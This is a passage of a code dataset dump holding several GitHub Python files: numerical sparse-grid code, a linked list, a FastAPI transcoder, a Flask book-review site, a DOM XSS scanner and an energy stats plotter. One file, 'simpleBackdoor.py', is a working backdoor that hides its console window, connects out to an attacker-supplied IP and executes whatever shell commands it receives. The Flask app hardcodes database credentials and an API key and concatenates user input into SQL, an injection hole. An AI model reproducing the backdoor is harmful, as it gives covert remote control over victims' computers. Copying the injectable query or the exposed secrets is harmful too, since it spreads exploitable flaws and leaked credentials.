delta_coeff):\n\n\t\tnorm = 0.\n\n\t\tif not isinstance(delta_coeff, np.ndarray) == 1:\n\t\t\tnorm = np.asscalar(delta_coeff)**2\n\t\telse:\n\t\t\tnorm = np.sum([c**2 for c in delta_coeff])\n\n\t\tnorm = np.sqrt(norm)\n\n\t\treturn norm\n\n\tdef _get_local_error_idicator(self, delta_coeff, no_points):\n\t\t\n\t\tlocal_error = self._get_norm_delta(delta_coeff)/no_points\n\n\t\treturn local_error\n\n\tdef init_adaption(self, init_coeff, init_no_points):\n\n\t\tself._key_O \t\t\t\t\t\t\t\t= -1\n\t\tself._key_A \t\t\t\t\t\t\t\t= 0\n\t\tself._key_local_error \t\t\t\t\t\t= 0\n\t\tself._A[self._key_A] \t\t\t\t\t\t= self._init_multiindex\n\t\tlocal_error_indicator \t\t\t\t\t\t= self._get_local_error_idicator(init_coeff, init_no_points)\n\t\tself._local_error[self._key_local_error] \t= local_error_indicator\n\t\tself._eta \t \t\t\t\t\t\t\t\t= local_error_indicator\n\n\t\tself._init_no_points = init_no_points\n\t\tself._multiindex_set.append(self._init_multiindex)\n\n\t\tself._local_basis_local[repr(self._init_multiindex)] \t= self._get_local_hierarchical_basis(self._init_multiindex)\n\t\tself._local_basis_global \t\t\t\t\t\t\t\t= self._get_local_hierarchical_basis(self._init_multiindex)\n\n\tdef do_one_adaption_step_preproc(self):\n\n\t\tlocal_multiindices = []\n\n\t\tmax_index \t= self._select_highest_priority_index()\n\t\tmax_i \t\t= self._A[max_index]\n\t\t\n\t\tself._key_O\t\t\t\t+= 1\n\t\tself._O[self._key_O] \t= max_i\n\t\tself._eta \t\t\t\t-= self._local_error[max_index]\n\n\t\tdel self._A[max_index]\n\t\tdel self._local_error[max_index]\n\n\t\tneighbors_i = Multiindex(self._dim).get_successors(max_i)\n\t\tfor neighbor in neighbors_i:\n\t\t\tif self._is_O_admissible(neighbor):\n\n\t\t\t\tlocal_multiindices.append(neighbor)\n\n\t\t\t\tself._key_A \t\t+= 1\n\t\t\t\tself._A[self._key_A] = neighbor\n\n\t\t\t\tself._multiindex_set.append(neighbor)\n\n\t\t\t\tlocal_basis_neighbor = np.array([self._get_no_1D_grid_points(n) - 1 for n in neighbor], dtype=int)\n\t\t\t\tself._update_local_basis(neighbor.tolist(), local_basis_neighbor)\n\n\t\tlocal_multiindices = np.array(local_multiindices, dtype=int)\n\n\t\treturn local_multiindices\n\n\tdef do_one_adaption_step_postproc(self, curr_coeffs, no_points):\n\n\t\tfor no_points_level, delta_coeff in zip(no_points, curr_coeffs):\n\t\t\tself._key_local_error \t\t\t\t\t+= 1\n\t\t\tlocal_error_indicator\t\t\t\t\t = self._get_local_error_idicator(delta_coeff, no_points_level)\n\t\t\tself._local_error[self._key_local_error] = local_error_indicator\n\n\t\t\tself._eta += local_error_indicator\n\n\tdef check_termination_criterion(self):\n\n\t\tmax_level = np.max(self._multiindex_set)\n\t\tif len(self._A.values()) == 0 or self._eta <= self._tol or max_level >= self._max_level:\n\t\t\tself._stop_adaption = True\n\n\tdef serialize_data(self, serialization_file):\n\t\t\n\t\twith open(serialization_file, \"wb\") as output_file:\n\t\t\tdata = [self._key_O, self._O, self._key_A, self._A, self._key_local_error, self._local_error, \\\n\t\t\t\t\t\t\t\t\t\tself._eta, self._multiindex_set, self._local_basis_local, self._local_basis_global]\n\t\t\tdump(data, output_file)\n\n\t\toutput_file.close()\n\n\tdef unserialize_data(self, serialization_file):\n\n\t\twith open(serialization_file, \"rb\") as input_file:\n\t\t\tself._key_O, self._O, self._key_A, self._A, self._key_local_error, self._local_error, \\\n\t\t\t\t\t\t\t\t\t\tself._eta, self._multiindex_set, self._local_basis_local, self._local_basis_global = 
load(input_file)\n\n\t\tinput_file.close()","repo_name":"ionutfarcas/sensitivity-driven-sparse-grid-approx","sub_path":"sg_lib/adaptivity/spectral_error_work.py","file_name":"spectral_error_work.py","file_ext":"py","file_size_in_byte":3889,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"23202725156","text":"class single_ll:\n def __init__(self, content):\n self.data = content\n self.next = None\n\n @staticmethod\n def print_ll(node):\n if node == None:\n print(\"Empty LL\")\n return\n ll_str = ''\n while(node.next != None):\n ll_str = ll_str + str(node.data) + \"--->\"\n node = node.next\n ll_str = ll_str + str(node.data)\n print(ll_str)\n\n @staticmethod\n def print_ll_using_rec(node):\n if node != None:\n print(node.data)\n single_ll.print_ll_using_rec(node.next)\n\n @staticmethod\n def rev_ll(node):\n if node.next != None:\n next_node = single_ll.rev_ll(node.next)\n next_node.next = node\n \n \n return next_node\n \n \n\nif __name__ == \"__main__\":\n\n head = None\n while True:\n data = raw_input(\"Enter Choice:\\n1. Enter LL:\\n2. Print LL\\n3. Reverse LL\\n4. Exit\\n\")\n if data == '1':\n dat_list = raw_input(\"Insert your LL:\\n\").strip().split()\n for dat in dat_list:\n if head == None:\n head = single_ll(dat)\n continue\n new_node = single_ll(dat)\n node = head\n while(node.next != None):\n node = node.next\n node.next = new_node\n elif data == '2':\n single_ll.print_ll(head)\n elif data == '3':\n head = single_ll.rev_ll(head)\n elif data == '4':\n print('Bye!')\n break\n else:\n print('Wrong Entry')\n","repo_name":"mindalkar/python-code","sub_path":"linked_list/single_ll.py","file_name":"single_ll.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73663136451","text":"from fastapi import FastAPI, UploadFile, File, HTTPException\nimport uvicorn\nimport shutil\nimport os\nfrom ffmpeg_convert import FFMConverter\nfrom fastapi.responses import FileResponse\nimport glob\nimport ffmpeg\nimport pandas as pd\nimport random\nimport string\nfrom decouple import config\n\n\n# Begin API\napp = FastAPI()\n\n@app.post(\"/\")\nasync def upload(file: UploadFile = File(...)):\n # Stream Info\n stream_info_df = pd.read_csv('stream_info.csv')\n crash_analytics_df = pd.read_csv('crash_analytics.csv')\n\n file_name = file.filename\n file_path = r'Uploads/'+ file_name\n files_list = list(glob.glob(r\"Uploads/*\"))\n files_list = [file.replace('\\\\', '/') for file in files_list]\n\n # If a file with same name is uploaded again, overwrite permission is being asked on the server.\n # To override that we'll create a duplicate filename.\n num = 2\n while file_path in files_list:\n if num == 2:\n file_name = file_name.split('.')[0]+'-' +str(num)+'.'+file_name.split('.')[1]\n file_path = r'Uploads/' + file_name\n else:\n file_name = file_name.split('-')[0]+'-' +str(num)+'.'+file_name.split('.')[1]\n file_path = r'Uploads/' + file_name\n num = num+1\n\n # Save the uploaded file on server\n try:\n with open(file_path, \"wb\") as buffer:\n shutil.copyfileobj(file.file, buffer)\n await file.close()\n except:\n error_msg = 'Timeout error: The uploaded file is too large.'\n crash_analytics_df.loc[len(crash_analytics_df)] = [408,\n error_msg,\n 0]\n crash_analytics_df.to_csv('crash_analytics.csv', index=False)\n raise HTTPException(status_code=408, detail=error_msg)\n\n\n # Transcode the uploaded file to mp3/mp4 - based on the format of the 
file.\n ffm = FFMConverter()\n try:\n file_type = ffmpeg.probe(file_path)['streams'][0]['codec_type']\n except:\n os.remove(file_path) #Delete the unwanted file.\n error_msg = 'The uploaded file is neither a video nor an audio file.'\n crash_analytics_df.loc[len(crash_analytics_df)] = [406,\n error_msg,\n file_path.split('.')[1]]\n crash_analytics_df.to_csv('crash_analytics.csv',index=False)\n raise HTTPException(status_code=406, detail=error_msg)\n\n url_key = \"\".join(random.sample(string.ascii_lowercase + string.ascii_uppercase + string.digits\n , 10))\n if file_type == 'audio':\n download_file_name = file_name.split('.')[0] + '_transcoded.mp3'\n ffm.convert_py(file_path, r'Downloads/'+download_file_name)\n download_url = config('host')+r'download/'+file_name.split('.')[0]+'_transcoded.mp3'+'?url_key='+str(url_key)\n duration = ffmpeg.probe(r'Downloads/'+file_name.split('.')[0]+'_transcoded.mp3')['format']['duration']\n elif file_type == 'video':\n download_file_name = file_name.split('.')[0] + '_transcoded.mp4'\n ffm.convert_py(file_path, r'Downloads/'+download_file_name)\n download_url =config('host')+r'download/' + file_name.split('.')[0] + '_transcoded.mp4'+'?url_key='+str(url_key)\n duration = ffmpeg.probe(r'Downloads/'+file_name.split('.')[0]+'_transcoded.mp4')['format']['duration']\n else:\n error_msg = 'The uploaded file is neither a video nor an audio file.'\n crash_analytics_df.loc[len(crash_analytics_df)] = [406,\n error_msg,\n file_path.split('.')[1]]\n crash_analytics_df.to_csv('crash_analytics.csv', index=False)\n raise HTTPException(status_code=406,\n detail=error_msg)\n\n #os.remove(file_path) - Optional Feature to not save files on the server.\n\n\n stream_info_df.loc[len(stream_info_df)] = [file_name,\n file_type,\n float(os.path.getsize(file_path)/1024),\n duration,\n download_file_name,\n download_url,\n url_key]\n stream_info_df.to_csv('stream_info.csv',index=False)\n\n\n #Response\n return {\"file name\": file.filename,\n \"file type\": file_type,\n \"size (kb)\": float(os.path.getsize(file_path)/1024),\n \"Download mp4 url\": download_url,\n \"Durations (s)\": duration\n }\n\n@app.get(\"/download/{file_name}\")\nasync def download(file_name: str, url_key: str):\n stream_info_df = pd.read_csv('stream_info.csv')\n df = stream_info_df[stream_info_df['download_file_name'] == str(file_name)]\n print(str(df.url_key.to_list()[0]))\n if df.url_key.to_list()[0] == url_key: #Remove this condition for publicly shareable URLS\n return FileResponse(r'Downloads/'+file_name)\n\n\n@app.get(\"/analytics\")\ndef analytics():\n stream_info_df = pd.read_csv('stream_info.csv')\n df = stream_info_df[['file_name', 'file_type', 'size_kb', 'duration_s']]\n return df.to_dict()\n\n\n@app.get(\"/crashanalytics\")\ndef analytics():\n crash_analytics_df = pd.read_csv('crash_analytics.csv')\n print(crash_analytics_df)\n return crash_analytics_df[['status_code','file_type']].to_dict()\n\nif __name__ == '__main__':\n uvicorn.run(app)","repo_name":"d-saikrishna/Transcode","sub_path":"transcode.py","file_name":"transcode.py","file_ext":"py","file_size_in_byte":5601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"29629051768","text":"import os\n\nimport json\nimport requests\n\nfrom flask import Flask, render_template,request,redirect,g,url_for,jsonify\nfrom flask_session import Session\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker\nfrom helper import *\n\napp = 
Flask(__name__)\napp.secret_key='PAS074BEL033'\n\n# Check for environment variable\n#if not (\"postgres://svnvtjemvqnasi:0367c449c3f870110f30008d5500264e9ff39065cf04d3676e6794b44f41ba90@ec2-50-17-178-87.compute-1.amazonaws.com:5432/dfb6qsqakpdnee\"):\n # raise RuntimeError(\"DATABASE_URL is not set\")\n\n# Configure session to use filesystem\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\nSession(app)\n\n# Set up database\nengine = create_engine(\"postgres://syahiefttgcgvy:db851348c34b1236c173ba3e53c344b48f6b32f569c78dd10a24333ca00f9b1d@ec2-54-81-37-115.compute-1.amazonaws.com:5432/d1q9cltmus4bb3\")\ndb = scoped_session(sessionmaker(bind=engine))\n\n\n#index page\n@app.route(\"/\")\ndef index():\n\treturn render_template(\"layout.html\")\n#login page\n@app.route(\"/login\",methods=[\"GET\",\"POST\"])\ndef login():\n\t#getting username and database\n\tif request.method==\"POST\":\n\t\tsession.pop('user',None)\n\t\tusername=request.form.get(\"name\")\n\t\tpassword=request.form.get(\"password\")\n\t\tlogging=db.execute(\"SELECT username,password FROM users WHERE username=:username AND password=:password\",{\"username\":username,\"password\":password}).fetchone()\n\t\tif logging is None:\n\t\t\terror=\"Username or Password is wrong.Try again.\"\n\t\t\treturn render_template(\"login.html\",error=error)\n\t\t\t\n\t\tsession['user']=username\n\t\treturn redirect(url_for('search'))\n\tsession.pop('user',None)\n\treturn render_template(\"login.html\")\n#page for registration\n@app.route(\"/signin\",methods=[\"GET\",\"POST\"])\ndef signin():\n\tif request.method==\"POST\":\n\t\t#taking the information\n\t\tusername=request.form.get(\"username\")\n\t\tpassword=request.form.get(\"password\")\n\t\temail=request.form.get(\"email\")\n\t\tnumber=request.form.get(\"phone\")\n\t\t#checking the information for unique identity\n\t\tregistering=db.execute(\"SELECT username,email,phone FROM users WHERE username=:username\",{\"username\":username}).fetchone()\n\t\tif registering is not None:\n\t\t\terror=\"username taken\"\n\t\t\treturn render_template(\"signin.html\",error=error)\n\t\tregistering=db.execute(\"SELECT username,email,phone FROM users WHERE email=:email\",{\"email\":email}).fetchone()\n\t\tif registering is not None:\n\t\t\terror=\"email already registerd\"\n\t\t\treturn render_template(\"signin.html\",error=error)\n\n\t\tdb.execute(\"INSERT INTO users(username,password,email,phone) VALUES (:username,:password,:email,:phone)\",{\"username\":username,\"password\":password,\"email\":email,\"phone\":number})\n\t\tdb.commit()\n\t\treturn redirect(url_for('login'))\n\treturn render_template(\"signin.html\")\n\n@app.route(\"/search\", methods=[\"GET\",\"POST\"])\n\ndef search():\n\tusername=session.get('user')\n\tif username is None:\n\t\treturn render_template(\"login.html\")\t\n\tif request.method==\"POST\":\n\t\tbooksearch=request.form.get(\"booksearch\")\n\t\tallbooks=db.execute(\"SELECT * FROM books WHERE isbn iLIKE '%\"+booksearch+\"%' OR title iLIKE '%\"+booksearch+\"%' OR author LIKE '%\"+booksearch+\"%'\").fetchall()\n\t\tif allbooks is None:\n\t\t\terror=\"There is no such book in our database.\"\n\t\t\treturn render_template(\"allbooks.html\", error=error)\n\t\telse:\n\t\t\treturn render_template(\"allbooks.html\",allbooks=allbooks)\n\tallbooks=db.execute(\"SELECT * FROM books\").fetchall()\n\treturn render_template(\"search.html\",allbooks=allbooks)\n\n\n\n@app.route(\"/book/\",methods=[\"GET\",\"POST\"])\ndef 
book(isbn):\n\tusername=session.get('user')\n\tif username is None:\n\t\treturn render_template(\"login.html\")\n\tbook=db.execute(\"SELECT * FROM books WHERE isbn=:isbn\",{\"isbn\" : isbn}).fetchone()\n\tif book is None:\n\t\terror=\"No such book.\"\n\t\treturn render_template(\"book.html\", error=error)\n\treview=db.execute(\"SELECT * FROM reviews WHERE isbn=:isbn\",{\"isbn\":isbn}).fetchall()\n\tif review is None:\n\t\terror=\"No reviews.\"\n\t\treturn render_template(\"book.html\",book=book, error=error)\n\tx =10 - len(isbn)\n\tisbn1 = isbn\n\tfor i in range(x):\n\t\tisbn1 = \"0\" + isbn1\t\n\tres = requests.get(\"https://www.goodreads.com/book/review_counts.json\",params={\"key\": \"l9Zjg0kQ4XBSgWzF4swoEw\", \"isbns\":isbn1}).json()[\"books\"][0]\n\tratings_count = res[\"ratings_count\"]\n\taverage_rating = res[\"average_rating\"]\n\tif request.method == \"POST\":\n\t\tcomment = db.execute(\"SELECT * FROM reviews WHERE username= :username and isbn=:isbn\",{\"username\":username,\"isbn\":isbn}).fetchone()\n\t\tif comment is None:\n\t\t\treview=request.form.get(\"review\")\n\t\t\trating=request.form.get(\"rating\")\n\t\t\tdb.execute(\"INSERT INTO reviews(review,rating,username,isbn) VALUES(:review,:rating,:username,:isbn)\",{\"review\":review,\"rating\":rating,\"username\":username,\"isbn\":isbn})\n\t\t\tdb.commit()\n\t\telse:\n\t\t\treview = db.execute(\"SELECT * FROM reviews WHERE isbn=:isbn\",{\"isbn\":isbn}).fetchall()\n\t\t\treturn render_template(\"book.html\", book=book, review=review,error=\"Already Commented\",ratings_count=ratings_count,average_rating=average_rating)\n\treview=db.execute(\"SELECT * FROM reviews WHERE isbn=:isbn\",{\"isbn\":isbn}).fetchall()\n\treturn render_template(\"book.html\", book=book, review=review,ratings_count=ratings_count,average_rating=average_rating)\n\n@app.route(\"/api/\")\ndef api(isbn):\n book=db.execute(\"SELECT * FROM books WHERE isbn = :isbn\",{\"isbn\":isbn}).fetchone()\n x =10 - len(isbn)\n isbn1 = isbn\n for i in range(x):\n \tisbn1 = \"0\" + isbn1\n if book==None:\n return render_template('404.html')\n res = requests.get(\"https://www.goodreads.com/book/review_counts.json\",params={\"key\": \"l9Zjg0kQ4XBSgWzF4swoEw\", \"isbns\":isbn1}).json()[\"books\"][0]\n ratings_count = res[\"ratings_count\"]\n average_rating = res[\"average_rating\"]\n x = {\n \"title\": book.title,\n \"author\": book.author,\n \"year\": 1333,\n \"isbn\": isbn,\n \"review_count\": ratings_count,\n \"average_score\": average_rating\n }\n return jsonify(x)\n\n@app.route(\"/logout\")\ndef logout():\n\tsession.pop('user',None)\n\treturn redirect(url_for('login'))\n\n\n\n\n\n\nif __name__ == '__main__':\n \tmain() ","repo_name":"SandeshPaudel/CS50W-web-programming-with-python-and-jacascript-project-1","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":6038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"23546808433","text":"#!wine /root/.wine/drive_c/Python27/python.exe\n# -*- coding: utf-8 -*-\nimport subprocess,socket,win32console,win32gui\n\nHOST = 'YOUR_IP'\nPORT = 6000\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((HOST, PORT))\ns.send('Ola Bem vindo - Simples Backdoor\\n')\n\ndef hide():\n window = win32console.GetConsoleWindow()\n win32gui.ShowWindow(window,0)\n return True\n\t\ndef main():\t\n\thide()\n\twhile 1:\n\t\tvar = s.recv(1024)\n\t\tif var == \"exit\":\n\t\t\tbreak\t\n\t\tposs = subprocess.Popen(var, shell=True, 
stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n\t\tstdoutput = poss.stdout.read() + poss.stderr.read()\n\t\ts.send(stdoutput)\n\ts.send('adeus')\n\ts.close()\nif __name__ == \"__main__\":\n\tmain()\t\n","repo_name":"msOlivers/PacketofScripts","sub_path":"simpleBackdoorPython/simpleBackdoor.py","file_name":"simpleBackdoor.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"70690583172","text":"import os\nimport argparse\nimport logging\nfrom tkinter import *\nfrom tkinter import ttk\nfrom src.Analyzer import ClientSideVulnerabilityAnalyzer\nfrom tqdm import tqdm\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"DOM BASED XSS SCANNER\")\n #Parse the input url from console\n parser.add_argument(\"--url\", help=\"Target website url\", required=True)\n #If detailed processes, add -v tag of console request\n parser.add_argument(\"-v\", \"--verbose\", help=\"Increase verbosity level\", action=\"store_true\")\n args = parser.parse_args()\n\n if args.verbose:\n logging.basicConfig(level=logging.DEBUG)\n logging.info(\"Verbosity ON\")\n\n os.system(\"clear\" if os.name == \"posix\" else \"cls\")\n #Initialize the analyzer\n analyzer = ClientSideVulnerabilityAnalyzer.ClientSideVulnerabilityAnalyzer()\n \n\n # Create a new session and connect with the website\n print(\"Session creating\", end='\\r')\n analyzer.create_session(args.url)\n print(\"Session created \")\n\n # Render javascipt code in response html\n print(\"HTML rendering\", end='\\r')\n analyzer.render_response_html()\n print(\"HTML rendered \")\n\n # Get all scripts from response html page (inline - external)\n print(\"Scripts crawling\", end='\\r')\n scripts = analyzer.get_scripts()\n print(\"Scripts crawled \")\n\n print(f\"Analyzing started for {analyzer.url}\\n\\n\")\n\n parsed_scripts = []\n not_parsed = []\n progress_bar = tqdm(total=len(scripts) * 4)\n # enumarate nedir bak\n for idx, script in enumerate(scripts):\n try:\n parsed_script = analyzer.parse(script[1]) \n analyzer.CDISScanner.scan(analyzer.response.html, parsed_script)\n analyzer.DOMScanner.scan(parsed_script)\n analyzer.CSDSScanner.scan(analyzer.response.html)\n progress_bar.update(4)\n except Exception as e:\n not_parsed.append([\"javascript parsing\", f\"script {idx}\", e])\n progress_bar.update(4)\n\n progress_bar.close()\n #Tkinter Interface\n window = Tk()\n\n window.title(\"Welcome to LikeGeeks app\")\n\n window.geometry('600x600')\n b = f\"\"\"\\n\\n\\t\\t\\tRESULTS\n \n \n Cross Domain Information Leakage\n Inline vulnerabilities\\t->\\t{len(analyzer.CDISScanner.inline_vulns)}\n Linked vulnerabilities\\t->\\t{len(analyzer.CDISScanner.linked_vulns)}\n\n Dom Based XSS\n Vulnerabilities\\t->\\t{len(analyzer.DOMScanner.vulns)}\n\n Client Side Logic and Data Storage\n Vulnerabilities\\t->\\t{len(analyzer.CSDSScanner.vulns)}\n\n \\n\\n\"\"\"\n\n lbl = Label(window, text=b)\n \n\n lbl.grid(column=0, row=0)\n\n\n window.mainloop()\n\n if not_parsed:\n if input(\"Some errors occured during runtime! 
Want to see errors?(y/n)\").lower() == 'y':\n for err in not_parsed:\n print(f\"\\\"{err[2]}\\\" while {err[0]} on {err[1]}\")\n \n if input(\"Print detailed report?(y/n)\").lower() == 'y':\n print(analyzer.report())","repo_name":"denizcanbeytas/Clientside-Vulnerability-JavascriptDetector","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2968,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"28007137697","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib\nfrom matplotlib import ticker\nimport os\nimport csv\nimport json\nfrom statistics import median, mean, stdev\nfrom math import sqrt\n\nfrom colorama import init as colorama_init\nfrom colorama import Fore\nfrom colorama import Style\n\ncolorama_init()\n\n\n@ticker.FuncFormatter\ndef major_formatter_y(x, pos):\n x_str = str(int(x))\n counter = 0\n out_lst = []\n\n for i in range(len(x_str) - 1, -1, -1):\n symb = x_str[i]\n counter += 1\n\n if counter % 4 == 0:\n out_lst.append('_')\n counter = 1\n\n out_lst.append(symb)\n\n out_lst.reverse()\n return ''.join(out_lst)\n\n\nclass StatsPlotter:\n def __init__(self, power_consts, clusters, z_val, need_ci, fig_size, rotation):\n self.power_consts = power_consts\n self.clusters = clusters\n self.z_val = z_val\n self.need_ci = need_ci\n self.fig_size = fig_size # [25, 9]\n self.rotation = rotation # 45\n\n def get_time_stats(self, test_names, dict_test_number, path_to_results):\n result_stats = {}\n for t_name in test_names:\n result_stats[t_name] = {}\n all_times = []\n\n for test_number in range(0, dict_test_number[t_name]):\n curr_path = os.path.join(path_to_results, t_name, str(test_number))\n json_files = list(filter(lambda name: name[-5:] == '.json', os.listdir(curr_path)))\n\n for json_name in json_files:\n with open(os.path.join(curr_path, json_name)) as file:\n temp_stat_time = json.load(file)['test_time(sec)']\n all_times.append(temp_stat_time)\n\n result_stats[t_name]['mean(sec)'] = mean(all_times)\n result_stats[t_name]['stdev(sec)'] = stdev(all_times)\n result_stats[t_name]['times_amount'] = len(all_times)\n\n path_stat = os.path.join(path_to_results, 'test_time_stats.json')\n with open(path_stat, 'w') as outfile:\n json.dump(result_stats, outfile, sort_keys=True, indent=4)\n\n return result_stats\n\n def get_results_dict(self, labeled_govs, test_names, dict_test_number, path_to_results):\n results_d = {}\n\n for freq_gov in labeled_govs:\n results_d[freq_gov] = {}\n\n for test_name in test_names:\n results_d[freq_gov][test_name] = {}\n no_file_flag = False\n\n for test_number in range(0, dict_test_number[test_name]):\n results_d[freq_gov][test_name][test_number] = {'freq': {}, 'idle': {}}\n\n print(f'--- {freq_gov}, {test_name}, {test_number} ----')\n\n # Freq reader\n path_this_test_csvs = os.path.join(path_to_results, test_name, str(test_number))\n\n for cluster_n in range(0, len(self.clusters)):\n path_csv = os.path.join(path_this_test_csvs,\n f'{test_number}_freq_diff_cluster{cluster_n}'\n f'_{freq_gov}_{test_name}.csv')\n print(path_csv)\n\n if not os.path.exists(path_csv):\n print(f'FILE {path_csv} NOT EXISTS')\n no_file_flag = True\n break\n\n with open(path_csv, 'r', newline=\"\") as csvfile:\n freq_reader = csv.reader(csvfile, delimiter=';', quotechar='\"', quoting=csv.QUOTE_ALL)\n\n line_num = -1\n results_d[freq_gov][test_name][test_number]['freq'][cluster_n] = {}\n\n for row in freq_reader:\n\n line_num += 1\n\n if line_num == 0:\n continue\n\n 
results_d[freq_gov][test_name][test_number]['freq'][cluster_n][int(row[0])] = int(\n row[1])\n\n if no_file_flag:\n no_file_flag = False\n break\n\n # IDLE reader\n path_csv_idle = os.path.join(path_this_test_csvs,\n f'{test_number}_idle_diff_{freq_gov}_{test_name}.csv')\n print(path_csv_idle)\n\n for cluster_n in range(0, len(self.clusters)):\n for core_n in self.clusters[cluster_n]:\n results_d[freq_gov][test_name][test_number]['idle'][core_n] = {}\n\n with open(path_csv_idle, 'r', newline=\"\") as csvfile:\n idle_reader = csv.reader(csvfile, delimiter=';', quotechar='\"', quoting=csv.QUOTE_ALL)\n\n line_num = -1\n\n for row in idle_reader:\n\n line_num += 1\n\n if line_num == 0:\n continue\n\n for core in results_d[freq_gov][test_name][test_number]['idle'].keys():\n results_d[freq_gov][test_name][test_number]['idle'][core][line_num - 1] = {}\n\n for index_cpu in range(1, len(row)):\n results_d[freq_gov][test_name][test_number]['idle'][index_cpu - 1][line_num - 1] = \\\n int(row[index_cpu])\n return results_d\n\n def get_energy_consumption_freq(self, power_constants, clusters, freqs_dict):\n\n energy_sum = 0\n\n for cluster_n in range(0, len(clusters)):\n for freq in freqs_dict[cluster_n].keys():\n temp_sum = freqs_dict[cluster_n][freq] * power_constants[cluster_n][freq]\n energy_sum += temp_sum * len(clusters[cluster_n])\n\n return energy_sum / float(3600 * 100)\n\n def get_energy_consumption_freq_and_idle_low_freq(self, power_constants, clusters, freqs_dict, idle_dict):\n\n energy_sum = 0\n\n for cluster_n in range(0, len(clusters)):\n\n min_freq = min(freqs_dict[cluster_n].keys())\n\n for core_n in clusters[cluster_n]:\n\n for freq in freqs_dict[cluster_n].keys():\n\n if freq == min_freq:\n freq_time = freqs_dict[cluster_n][freq] - (float(idle_dict[core_n][1]) / 1_0_000.0)\n if freq_time < 0:\n # raise Exception(f\"freq_time < 0 | cluster:{cluster_n}, \"\n # f\"freq{freq} time:{freqs_dict[cluster_n][freq]}, \"\n # f\"idle time: {idle_dict[core_n][1]}\")\n print(f'!!get_energy_consumption_freq_and_idle_low_freq!!')\n print(f\"{Fore.YELLOW}freq_time < 0 | cluster: {cluster_n}, core: {core_n}, \"\n f\"freq {freq} time: {freqs_dict[cluster_n][freq]}, \"\n f\"idle time: {idle_dict[core_n][1]}{Style.RESET_ALL}\")\n freq_time = 0.0\n else:\n freq_time = freqs_dict[cluster_n][freq]\n\n temp_sum = freq_time * power_constants[cluster_n][freq]\n\n energy_sum += temp_sum\n return energy_sum / float(3600 * 100)\n\n def get_energy_consumption_freq_idle_precent(self, power_constants, clusters, freqs_dict, idle_dict):\n energy_sum = 0\n for cluster_n in range(0, len(clusters)):\n\n time_sum = float(sum(freqs_dict[cluster_n].values()))\n\n for core_n in clusters[cluster_n]:\n\n for freq in freqs_dict[cluster_n].keys():\n time_precent = freqs_dict[cluster_n][freq] / time_sum\n\n freq_time = freqs_dict[cluster_n][freq] - (float(idle_dict[core_n][1]) / 1_0_000.0) * time_precent\n\n if freq_time < 0:\n print(f'!!!!! 
get_energy_consumption_freq_idle_precent !!!!!!!')\n print(f\"{Fore.MAGENTA}freq_time < 0 | cluster:{cluster_n}, core: {core_n}, \"\n f\"freq{freq} time:{freqs_dict[cluster_n][freq]}, \"\n f\"idle time: {idle_dict[core_n][1]}{Style.RESET_ALL}\")\n freq_time = 0.0\n\n temp_sum = freq_time * power_constants[cluster_n][freq]\n energy_sum += temp_sum\n\n return energy_sum / float(3600 * 100)\n\n def major_formatter_x(self, x):\n x_str = f'{x:.2f}'\n counter = 0\n out_lst = []\n\n for i in range(len(x_str) - 5, -1, -1):\n symb = x_str[i]\n counter += 1\n\n if counter % 4 == 0:\n out_lst.append('_')\n counter = 1\n\n out_lst.append(symb)\n\n out_lst.reverse()\n out_lst += x_str[-4:]\n return ''.join(out_lst)\n\n def get_approx_data(self, results_all, test_name, power_constants):\n result = dict()\n\n for freq_gov in results_all.keys():\n\n result[freq_gov] = {'solid_freq': [], 'min_freq_idle': [], 'freq_precent': []}\n\n for test_num in results_all[freq_gov][test_name].keys():\n solid_res = self.get_energy_consumption_freq(power_constants, self.clusters,\n results_all[freq_gov][test_name][test_num]['freq'])\n min_freq_minus_idle = self.get_energy_consumption_freq_and_idle_low_freq(power_constants,\n self.clusters,\n results_all[freq_gov][\n test_name][\n test_num]['freq'],\n results_all[freq_gov][\n test_name][\n test_num]['idle'])\n\n freq_precent_idle = self.get_energy_consumption_freq_idle_precent(power_constants,\n self.clusters,\n results_all[freq_gov][test_name][\n test_num][\n 'freq'],\n results_all[freq_gov][test_name][\n test_num][\n 'idle'])\n result[freq_gov]['solid_freq'].append(solid_res)\n result[freq_gov]['min_freq_idle'].append(min_freq_minus_idle)\n result[freq_gov]['freq_precent'].append(freq_precent_idle)\n\n return result\n\n def confidence_interval(self, collection):\n # https://www.statology.org/confidence-interval-for-median/\n col = collection.copy()\n col.sort()\n q = 0.5\n n = len(collection)\n\n j = round(n * q - self.z_val * sqrt(n * q * (1 - q)))\n if j > 0:\n j = j - 1\n\n k = round(n * q + self.z_val * sqrt(n * q * (1 - q))) - 1\n return [col[j], col[k]]\n\n def get_stats_data(self, processed_data):\n result = dict()\n\n for freq_gov in processed_data.keys():\n result[freq_gov] = dict()\n\n for approx_type in processed_data[freq_gov].keys():\n\n if self.need_ci:\n min_e, max_e = self.confidence_interval(processed_data[freq_gov][approx_type])\n else:\n min_e = min(processed_data[freq_gov][approx_type])\n max_e = max(processed_data[freq_gov][approx_type])\n\n median_e = median(processed_data[freq_gov][approx_type])\n\n result[freq_gov][approx_type] = {'min': min_e, 'max': max_e, 'median': median_e}\n\n return result\n\n def restruct_data_for_plot(self, data_dict, list_freq_govs):\n\n new_result_dict = {}\n\n for freq_gov in list_freq_govs:\n\n for approx_type in data_dict[freq_gov].keys():\n\n if approx_type not in new_result_dict.keys():\n new_result_dict[approx_type] = {'min': [], 'max': [], 